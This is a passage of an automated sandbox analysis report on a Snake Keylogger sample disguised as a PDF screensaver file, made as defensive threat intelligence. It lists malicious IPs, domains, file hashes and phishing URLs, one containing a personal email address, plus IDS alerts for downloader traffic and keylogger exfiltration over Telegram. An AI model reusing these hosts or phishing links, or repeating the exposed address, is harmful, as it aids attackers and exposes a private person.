                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                05:44:58API Interceptor35x Sleep call for process: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe modified
                                                                05:45:32API Interceptor831662x Sleep call for process: InstallUtil.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                  https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                    6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                      Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    160.22.121.182Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 160.22.121.182/STATO/Vskhdvzxu.mp3
                                                                                    158.101.44.242nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    checkip.dyndns.comQUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 132.226.247.73
                                                                                    Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.8.169
                                                                                    nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 158.101.44.242
                                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 193.122.6.168
                                                                                    aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    reallyfreegeoip.orgQUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.16.1
                                                                                    aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.48.1
                                                                                    h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    api.telegram.orghttps://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                    • 149.154.167.220
                                                                                    Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 149.154.167.220
                                                                                    nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                    • 149.154.167.220
                                                                                    h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUhttps://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                    • 149.154.167.99
                                                                                    http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.99
                                                                                    http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.99
                                                                                    https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.170.96
                                                                                    https://telegramerong.cc/app/Get hashmaliciousTelegram PhisherBrowse
                                                                                    • 149.154.167.99
                                                                                    https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    http://telegramerong.cc/appGet hashmaliciousTelegram PhisherBrowse
                                                                                    • 149.154.167.99
                                                                                    https://telegrams-mh.org/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.170.96
                                                                                    https://wkybcnfuqpgjx.ltd/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.99
                                                                                    CLOUDFLARENETUShttps://connexion-pro.support/adobe/s/assets/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.11.138
                                                                                    rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    g5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    http://aeromorning.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.4.102
                                                                                    https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 172.68.1.238
                                                                                    MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 172.67.132.227
                                                                                    Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.13.141
                                                                                    QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    ORACLE-BMC-31898UStrow.exeGet hashmaliciousUnknownBrowse
                                                                                    • 147.154.3.56
                                                                                    nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 158.101.44.242
                                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 193.122.6.168
                                                                                    aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    SIPL-ASSysconInfowayPvtLtdINfrosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.117.212.37
                                                                                    https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tGet hashmaliciousUnknownBrowse
                                                                                    • 120.138.96.3
                                                                                    c_shlellcode.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 111.119.200.175
                                                                                    Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                    • 160.22.201.149
                                                                                    Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.117.212.14
                                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                    • 160.21.14.112
                                                                                    hmips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 160.21.176.231
                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 160.22.166.105
                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 160.22.121.182
                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 160.21.29.33

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adQUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    Loader.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.80.1
                                                                                    mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    3b5074b1b5d032e5620f69f9f700ff0erRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    wuknbFMdeq.exeGet hashmaliciousFunkLockerBrowse
                                                                                    • 149.154.167.220
                                                                                    rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    https://www.flndmy.er-xu.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    https://support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    https://www.maps-s.xz-sr.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    https://www.support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    No created / dropped files found

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):5.65659436624594
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
                                                                                    File size:72'192 bytes
                                                                                    MD5:c264894ed58fdb81e565236476bfe7ca
                                                                                    SHA1:9f64388e03f8162ecca1ec6620b52b1a586ea369
                                                                                    SHA256:6b5d2ed235ccf7757a7144116baf1376abfd13b7fa5d87d130db3af889c72a51
                                                                                    SHA512:4f2ad5466c7da243758b9900de3e0897b04299622aa23adaf5be92f3dc1ac9b3ddd06d2fd5b36ca37d884fe17ae49d608cc407b782e89b1eda7d215c9358bee1
                                                                                    SSDEEP:1536:Z88lDhBttnpa7DvJ6/Vx7Si40gCs3CWpQ1QKqWI6Oac:BJ33nSDvJqVWLCjWpLKjIOc
                                                                                    TLSH:0B63F707F3AA8DB1D2605F3AC4E780014375F986E563DA0F394EB35908377BAAD52687
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._..g.............................!... ...@....@.. ....................................`................................

                                                                                    File Icon

                                                                                    Icon Hash:1919415190d04339

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4121de
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6784BE5F [Mon Jan 13 07:18:55 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x121900x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1264.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x101e40x10200940983c48e1540377ec7fa118dfb8fd7False0.4611040455426357data5.673053688879668IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x140000x12640x1400fb7cfc366a2f8dcf2fa3c3b63b218057False0.3337890625data4.566119839430058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x160000xc0x20019ceb33cb3c5607917ce473876a7300cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x141300xc28Device independent bitmap graphic, 23 x 64 x 32, image size 2944, resolution 7874 x 7874 px/m0.30623393316195374
                                                                                    RT_GROUP_ICON0x14d580x14data1.1
                                                                                    RT_VERSION0x14d6c0x30cdata0.4282051282051282
                                                                                    RT_MANIFEST0x150780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-13T11:45:31.793706+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708158.101.44.24280TCP
                                                                                    2025-01-13T11:45:32.809334+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708158.101.44.24280TCP
                                                                                    2025-01-13T11:45:33.374407+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549810104.21.80.1443TCP
                                                                                    2025-01-13T11:45:42.418700+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549816158.101.44.24280TCP
                                                                                    2025-01-13T11:45:42.971552+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549874104.21.80.1443TCP
                                                                                    2025-01-13T11:45:50.867254+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549930104.21.80.1443TCP
                                                                                    2025-01-13T11:45:52.063515+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549942104.21.80.1443TCP
                                                                                    2025-01-13T11:45:53.241532+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549949104.21.80.1443TCP
                                                                                    2025-01-13T11:45:59.068893+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549990149.154.167.220443TCP
                                                                                    2025-01-13T11:45:59.403234+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549990149.154.167.220443TCP
                                                                                    2025-01-13T11:46:09.255683+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549994149.154.167.220443TCP
                                                                                    2025-01-13T11:46:09.580717+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549994149.154.167.220443TCP
                                                                                    2025-01-13T11:46:10.195911+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549995149.154.167.220443TCP
                                                                                    2025-01-13T11:46:10.544550+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549995149.154.167.220443TCP
                                                                                    2025-01-13T11:46:11.172308+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549996149.154.167.220443TCP
                                                                                    2025-01-13T11:46:11.505378+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549996149.154.167.220443TCP
                                                                                    2025-01-13T11:46:12.131390+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549997149.154.167.220443TCP
                                                                                    2025-01-13T11:46:12.437061+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549997149.154.167.220443TCP
                                                                                    2025-01-13T11:46:13.053916+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549998149.154.167.220443TCP
                                                                                    2025-01-13T11:46:13.380749+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549998149.154.167.220443TCP
                                                                                    2025-01-13T11:46:14.002711+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549999149.154.167.220443TCP
                                                                                    2025-01-13T11:46:14.354472+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549999149.154.167.220443TCP
                                                                                    2025-01-13T11:46:14.997550+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550000149.154.167.220443TCP
                                                                                    2025-01-13T11:46:15.431879+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550000149.154.167.220443TCP
                                                                                    2025-01-13T11:46:16.077312+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550001149.154.167.220443TCP
                                                                                    2025-01-13T11:46:16.428522+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550001149.154.167.220443TCP
                                                                                    2025-01-13T11:46:17.151686+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550002149.154.167.220443TCP
                                                                                    2025-01-13T11:46:17.574644+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550002149.154.167.220443TCP
                                                                                    2025-01-13T11:46:18.220317+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550003149.154.167.220443TCP
                                                                                    2025-01-13T11:46:18.735150+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550003149.154.167.220443TCP
                                                                                    2025-01-13T11:46:19.348269+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550004149.154.167.220443TCP
                                                                                    2025-01-13T11:46:19.642055+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550004149.154.167.220443TCP
                                                                                    2025-01-13T11:46:20.276100+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550006149.154.167.220443TCP
                                                                                    2025-01-13T11:46:20.628475+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550006149.154.167.220443TCP
                                                                                    2025-01-13T11:46:21.268711+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550007149.154.167.220443TCP
                                                                                    2025-01-13T11:46:21.603199+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550007149.154.167.220443TCP
                                                                                    2025-01-13T11:46:22.221961+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550008149.154.167.220443TCP
                                                                                    2025-01-13T11:46:22.617688+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550008149.154.167.220443TCP
                                                                                    2025-01-13T11:46:23.281941+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550009149.154.167.220443TCP
                                                                                    2025-01-13T11:46:23.665126+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550009149.154.167.220443TCP
                                                                                    2025-01-13T11:46:24.289021+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550010149.154.167.220443TCP
                                                                                    2025-01-13T11:46:24.826805+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550010149.154.167.220443TCP
                                                                                    2025-01-13T11:46:25.467086+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550011149.154.167.220443TCP
                                                                                    2025-01-13T11:46:25.998096+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550011149.154.167.220443TCP
